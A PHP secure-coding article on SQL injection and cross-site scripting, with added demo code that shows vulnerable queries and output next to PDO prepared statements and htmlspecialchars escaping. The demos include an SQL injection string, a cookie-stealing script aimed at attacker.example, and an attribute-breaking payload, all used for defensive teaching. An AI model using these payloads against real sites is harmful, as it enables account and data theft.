12/12/2023

O'Reilly Programming PHP

As any PHP developer who has been around for a while will tell you, there's a certain kind of stigma that comes with the language. They'll hear it from their peers using other languages that PHP is "sloppy" or that "it's just a scripting language, not a real one." There's one other that seems to follow the language around as well: that it's insecure. Sure, PHP's not without its problems, but any language is going to have its share. Ruby has had several major vulnerabilities in the press lately, and Java has definitely had its own list over its extensive lifetime.

People put down PHP for not being secure, but they forget that it's not the language that makes for insecure code, it's the developer. PHP, by its nature, is "meant to die" at the end of every request, so its developers don't have to worry about some of the things that developers in more persistent languages do. There are still some common dangers, though, that you as a PHP developer should be aware of. The most common ones come from the well-known OWASP Top 10 list. Here's a quick look at how to help prevent just a few:

SQL Injection

If you keep up with security at all, you've undoubtedly seen articles about break-ins and hacks of large companies (smaller ones too) that were the result of something called a SQL injection (SQLi) flaw. Basically, this is an attack where the person wanting access to the system uses a specially formatted string as part of an input that gets down into the database level and executes a malicious command. For example, say an input in your script comes from the $_GET superglobal. If you're not escaping or filtering what the user is giving you, that value could be anything. Scary, right? Well, there's one easy thing you can do in PHP that can help with this. You can use the built-in database abstraction layer, PDO, and its prepared statements feature. Here's an example that could go a long way toward preventing SQL injection issues (only the prepare() call survives on this page; the $pdo handle and the execute() call that binds $_GET['bar'] to :one are reconstructed around it):

```php
$stmt = $pdo->prepare('select foo from baz where bar = :one');
$stmt->execute([':one' => $_GET['bar']]);
```

The thing that makes this different is that the value passed in isn't part of a SQL statement built as a string. Imagine the kind of problems that might be caused if you allowed something like:

Using bound parameters is a good (and effective) first line of defense in keeping your application safe from SQL injection.

Cross-Site Scripting

Cross-site scripting (XSS) is an attack where user output is blindly echoed back out to the browser unfiltered and unvalidated.
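The string-built query the article alludes to is not preserved on this page. The following is an added example, not the article's own code, that puts a concatenated query beside its PDO prepared-statement counterpart and runs the same hostile input through both. It assumes the pdo_sqlite extension so it can use an in-memory database; the table, column names and sample rows are constructed for the demonstration.

```php
<?php
// Added example (not from the original article): vulnerable string-built query
// beside the PDO prepared-statement version. Uses an in-memory SQLite database
// (assumes the pdo_sqlite extension) with constructed sample data so it runs
// offline. Table name, column names and rows are assumptions.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$pdo->exec('CREATE TABLE baz (foo TEXT NOT NULL, bar TEXT NOT NULL)');
$pdo->exec("INSERT INTO baz (foo, bar) VALUES ('alice-secret', 'alice'), ('bob-secret', 'bob')");

// VULNERABLE: the user-controlled value is spliced into the SQL text, so the
// quotes that delimit it are under the attacker's control. A value such as
// "' OR '1'='1" closes the literal and appends a condition that is always true.
function lookupVulnerable(PDO $pdo, string $bar): array
{
    $sql = "SELECT foo FROM baz WHERE bar = '" . $bar . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// SAFE: the SQL text is fixed at prepare() time; the value travels separately as
// a bound parameter and can only ever be compared as data, never parsed as SQL.
function lookupPrepared(PDO $pdo, string $bar): array
{
    $stmt = $pdo->prepare('SELECT foo FROM baz WHERE bar = :one');
    $stmt->bindValue(':one', $bar, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed hostile input standing in for $_GET['bar'].
$payload = "' OR '1'='1";

// Same payload, two very different outcomes: the concatenated query matches
// every row, while the prepared statement compares bar to the literal string
// "' OR '1'='1" and matches none.
echo 'vulnerable, honest input: ', json_encode(lookupVulnerable($pdo, 'alice')), PHP_EOL;
echo 'vulnerable, payload:      ', json_encode(lookupVulnerable($pdo, $payload)), PHP_EOL;
echo 'prepared, honest input:   ', json_encode(lookupPrepared($pdo, 'alice')), PHP_EOL;
echo 'prepared, payload:        ', json_encode(lookupPrepared($pdo, $payload)), PHP_EOL;
```

Two caveats worth keeping in mind. Parameters bind values only: a table name, column name or ORDER BY direction cannot be bound, so anything of that kind that comes from the user has to be checked against an allow-list before it goes anywhere near the query string. And with pdo_mysql, PDO emulates prepared statements client-side by default; setting PDO::ATTR_EMULATE_PREPARES to false makes the server do the binding, which is the behaviour the example above relies on.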
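The article's XSS section is cut off on this page after its opening sentence. As an added example, not the article's code, the block below shows the sink that sentence describes (a request value echoed straight back into HTML) next to the same output passed through htmlspecialchars, which is standard PHP practice rather than anything quoted from the article. The parameter name and the payloads are constructed for the demonstration.

```php
<?php
// Added example (not from the original article): a reflected-XSS sink beside its
// escaped form. htmlspecialchars with ENT_QUOTES is standard PHP practice, not a
// quote from the article. Input values are constructed to stand in for $_GET['name'].
declare(strict_types=1);

// VULNERABLE: the user-controlled value is echoed into the HTML body unfiltered,
// so any markup it contains is parsed by the browser as markup.
function greetVulnerable(string $name): string
{
    return '<p>Hello, ' . $name . '</p>';
}

// Escape at output time, for the context being written into. ENT_QUOTES covers
// both " and ' so the result is safe inside quoted attributes as well as in the
// body; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function greetEscaped(string $name): string
{
    return '<p>Hello, ' . esc($name) . '</p>';
}

// Constructed hostile input standing in for $_GET['name']; the domain is made up.
$payload = '<script>location="https://attacker.example/?c=" + document.cookie</script>';

// In the first line the script element reaches the browser intact; in the second
// the angle brackets have become entities and the browser renders them as text.
echo greetVulnerable($payload), PHP_EOL;
echo greetEscaped($payload), PHP_EOL;

// Attribute context: without ENT_QUOTES a stray double quote would close the
// value="..." attribute and let the attacker add an event handler.
$attrPayload = '" onmouseover="alert(1)';
echo '<input name="name" value="' . esc($attrPayload) . '">', PHP_EOL;
```

The escaping belongs at the point of output, not at input time: the same value may be written into an HTML body, an attribute, a URL or a JavaScript string, and each of those contexts needs its own encoding.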